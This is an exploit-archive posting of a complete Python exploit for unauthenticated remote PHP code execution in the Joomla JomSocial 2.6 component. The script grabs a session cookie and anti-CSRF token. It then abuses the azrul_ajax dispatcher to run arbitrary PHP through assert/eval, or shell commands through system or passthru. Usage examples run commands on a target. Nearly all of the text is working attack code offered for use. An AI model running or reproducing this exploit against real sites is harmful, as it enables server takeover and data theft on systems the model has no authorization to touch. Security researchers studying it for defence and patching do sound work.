Joomla JomSocial 2.6 Code Execution
Posted Jan 31, 2014
Authored by Matias Fontanini, Carlos Gaston Traberg

Joomla JomSocial component version 2.6 remote PHP code execution exploit.

tags | exploit, remote, php, code execution
MD5 | 2de6823a840b1df40cb6d64d7d514fbc

#!/usr/bin/python
#
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
#
# Authors:
# - Matias Fontanini
# - Gaston Traberg
#
# This exploit allows the execution of PHP code without any prior
# authentication on the Joomla! JomSocial component.
#
# Note: running arbitrary PHP (-p / -t) relies on assert() evaluating a
# string argument and on eval() being usable, so assert must be active and
# neither may be blocked by disable_functions or a hardening extension;
# string evaluation through assert() was removed in PHP 8, so that path only
# applies to older PHP releases. The dispatcher can also call a PHP function
# directly, without eval or assert (-s together with -n), so shell commands
# can still be run through "system", "passthru", etc. as long as those
# functions themselves are enabled.
#
# Examples:
#
# Execute PHP code:
# ./exploit.py -u http://example.com/index.php -p "echo 'Hello World!';"
# ./exploit.py -u http://example.com/index.php -p /tmp/script_to_execute.php
#
# Execute shell commands (using system()):
# ./exploit.py -u http://example.com/index.php -s "netstat -n"
#
# Execute shell commands (using a user-provided function, passthru in this case):
# ./exploit.py -u http://example.com/joomla/index.php -s "netstat -natp" -c passthru
#
# Exploit execution example:
# $ python exploit.py -u http://example.com/index.php -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"

import argparse
import base64
import json
import os
import re
import sys
import urllib
import urllib2

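class Exploit:
    """Drive the JomSocial ``azrul_ajax`` dispatcher to call PHP functions.

    The dispatcher accepts a JSON ``call`` array naming a PHP callable and a
    string argument.  This client uses it either to reach ``assert()`` with a
    string (which older PHP evaluates as code) or to call a shell function
    such as ``system`` directly.  Constructing an instance performs one
    request to obtain the session cookie and the anti-CSRF token.

    Attributes:
        url: Target ``index.php`` URL.
        user_agent: ``User-Agent`` value to send, or ``None`` for urllib2's default.
        use_eval: When true, ``call_function`` wraps the call in an eval'd snippet.
        cookie: ``Cookie`` header value replayed on every exploit request.
        token: 32-character anti-CSRF token; it is sent as a POST parameter *name*.
    """

    token_request_data = 'option=com_community&view=frontpage'
    # {0} = anti-CSRF token (Joomla checks for a parameter named after it),
    # {1} = URL-encoded JSON "call" document.
    exploit_request_data = ('option=community&no_html=1&task=azrul_ajax'
                            '&func=photos,ajaxUploadAvatar&{0}=1'
                            '&arg2=["_d_","Event"]&arg3=["_d_","374"]'
                            '&arg4=["_d_","{1}"]')
    # {0} = PHP callable, {1} = its argument; both must be JSON-string-escaped.
    json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'

    # Compiled once at class level (no target needed to exercise them).
    token_regex = re.compile(r'<input type="hidden" name="(\w{32})" value="1" />')
    # Function output comes back embedded in JSON-escaped HTML, hence the
    # doubled backslashes in these patterns.
    result_regex = re.compile(
        r'method=\\"POST\\" enctype=\\"multipart\\/form-data\\"><br>(.*)'
        r'<div id=\\"avatar-upload\\">', re.DOTALL)
    command_regex = re.compile(r'(.*)\[\["as","ajax_calls","d",""\]', re.DOTALL)

    def __init__(self, url, user_agent=None, use_eval=True):
        self.url = url
        self._set_user_agent(user_agent)
        self.use_eval = use_eval
        # One round trip: fresh session cookie plus its anti-CSRF token.
        self.cookie, self.token = self._retrieve_token()

    def _set_user_agent(self, user_agent):
        """Record the User-Agent to send (``None`` keeps urllib2's default)."""
        self.user_agent = user_agent

    def _make_opener(self, add_cookie=True):
        """Build a urllib2 opener carrying Referer, optional Cookie and UA."""
        opener = urllib2.build_opener()
        headers = [('Referer', self.url)]
        if add_cookie:
            headers.append(('Cookie', self.cookie))
        if self.user_agent:
            # Drop urllib2's default 'User-agent' entry instead of adding a
            # second one, so exactly one UA header reaches the target.
            opener.addheaders = [h for h in opener.addheaders
                                 if h[0].lower() != 'user-agent']
            headers.append(('User-Agent', self.user_agent))
        opener.addheaders.extend(headers)
        return opener

    @staticmethod
    def _extract_token(html):
        """Return the first 32-char hidden-input name in *html*, else ``None``."""
        found = Exploit.token_regex.findall(html)
        return found[0] if found else None

    @staticmethod
    def _cookie_header(set_cookie_values):
        """Turn a list of Set-Cookie header values into one Cookie header value.

        Only the ``name=value`` pair of each header is kept: attributes such as
        ``path`` or ``HttpOnly`` must not be echoed back to the server.
        """
        pairs = [v.split(';', 1)[0].strip() for v in set_cookie_values or []]
        return '; '.join(p for p in pairs if p)

    def _retrieve_token(self):
        """POST the frontpage view and return ``(cookie, token)``.

        Raises:
            Exception: if the response carries no token-shaped hidden input
                or no Set-Cookie header (the token is session-bound, so a
                token without its cookie is useless).
        """
        opener = self._make_opener(add_cookie=False)
        sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
        sys.stdout.flush()
        response = opener.open(self.url, Exploit.token_request_data)
        token = self._extract_token(response.read())
        cookie = self._cookie_header(response.headers.getheaders('Set-Cookie'))
        if token is None:
            print('Failed')
            raise Exception("Could not retrieve anti-CSRF token")
        if not cookie:
            print('Failed')
            raise Exception("Target did not set a session cookie")
        print('Done')
        return cookie, token

    @staticmethod
    def _json_escape(text):
        """Escape *text* for embedding inside a JSON string literal.

        Quotes alone are not enough: backslashes and control characters
        would otherwise produce a document the dispatcher cannot decode.
        """
        return json.dumps(text)[1:-1]

    @staticmethod
    def _php_quote(text):
        """Escape *text* for a PHP single-quoted string literal."""
        return text.replace('\\', '\\\\').replace("'", "\\'")

    def _build_request_data(self, function, parameter):
        """Return the POST body that makes the target run ``function(parameter)``."""
        call = Exploit.json_data.format(self._json_escape(function),
                                        self._json_escape(parameter))
        return Exploit.exploit_request_data.format(self.token, urllib.quote(call))

    def _do_call_function(self, function, parameter):
        """Invoke PHP ``function(parameter)`` on the target; return its output.

        For ``assert`` the whole response body is returned (the eval wrapper
        calls ``exit()``, so the body *is* the output).  For ``system`` /
        ``passthru`` and for any other function the output is cut out of the
        JSON-wrapped HTML; an error string is returned when it cannot be found.
        """
        opener = self._make_opener()
        body = opener.open(self.url,
                           self._build_request_data(function, parameter)).read()
        if function == 'assert':
            return body
        if function in ('system', 'passthru'):
            matches = self.command_regex.findall(body)
            if len(matches) == 1:
                return matches[0]
            return "[-] Error executing command."
        matches = self.result_regex.findall(body)
        if len(matches) == 1:
            # Undo the JSON escaping applied to the embedded HTML.
            return (matches[0].replace('\\/', '/')
                    .replace('\\"', '"').replace('\\n', '\n'))
        return "[-] Error executing command."

    def call_function(self, function, parameter):
        """Run ``function(parameter)`` on the target and return its output.

        With ``use_eval`` the call goes through ``eval`` as
        ``echo function('parameter')``, so *parameter* is escaped for a PHP
        single-quoted string; otherwise the dispatcher calls it directly.
        """
        if self.use_eval:
            snippet = "echo {0}('{1}')".format(function, self._php_quote(parameter))
            return self.eval(snippet)
        return self._do_call_function(function, parameter)

    def disabled_functions(self):
        """Return the target's ``disable_functions`` ini value."""
        return self.call_function("ini_get", "disable_functions")

    def test_injection(self):
        """Print whether a trivial eval() round trip returns the expected text."""
        result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
        if 'HELLO - WORLD' in result:
            print("[+] Code injection using eval works")
        else:
            print("[-] Code injection doesn't work. Try executing shell commands.")

    def eval(self, code):
        """Evaluate PHP *code* through assert() and return everything it printed.

        *code* is base64-wrapped so it needs no quoting, and the wrapper
        ``exit()``s afterwards to keep the component's own HTML out of the
        response.  A missing trailing ``;`` is added; empty input is allowed.
        """
        code = code.rstrip()
        if not code.endswith(';'):
            code += ';'
        payload = "@exit(@eval(@base64_decode('{0}')));".format(base64.b64encode(code))
        return self._do_call_function('assert', payload)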



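def _read_php_code(spec):
    """Resolve the -p argument to PHP source.

    ``'-'`` reads stdin, an existing file path reads that file, and anything
    else is taken as literal code.  Exits with status 1 if the file cannot
    be read.
    """
    if spec == '-':
        print('[i] Enter the code to be executed:')
        return sys.stdin.read()
    if os.path.isfile(spec):
        try:
            with open(spec) as fd:
                return fd.read()
        except (IOError, OSError):
            print("[-] Error reading the file.")
            sys.exit(1)
    return spec


def main():
    """Parse the command line, open the exploit session and run one action."""
    parser = argparse.ArgumentParser(
        description="JomSocial >= 2.6 - Code execution exploit"
    )
    parser.add_argument('-u', '--url', help='the base URL', required=True)
    parser.add_argument(
        '-p',
        '--php-code',
        help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
    parser.add_argument('-s', '--shell-command', help='the shell command to execute')
    parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
    parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
    # store_false: giving -n clears the flag; the dest name states what it means.
    parser.add_argument('-n', '--no-eval', dest='use_eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)

    args = parser.parse_args()
    if not (args.test or args.php_code or args.shell_command):
        print('[-] Need -p, -t or -s to do something...')
        sys.exit(1)
    url = args.url
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    try:
        # The constructor already talks to the target (cookie + token).
        exploit = Exploit(url, use_eval=args.use_eval)
        if args.test:
            exploit.test_injection()
        elif args.php_code:
            code = _read_php_code(args.php_code)
            print('[+] Executing PHP code...')
            print(exploit.eval(code))
        else:
            print(exploit.call_function(args.shell_function, args.shell_command))
    except Exception as ex:
        print('[-] Error: ' + str(ex))
        sys.exit(1)


if __name__ == '__main__':
    main()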
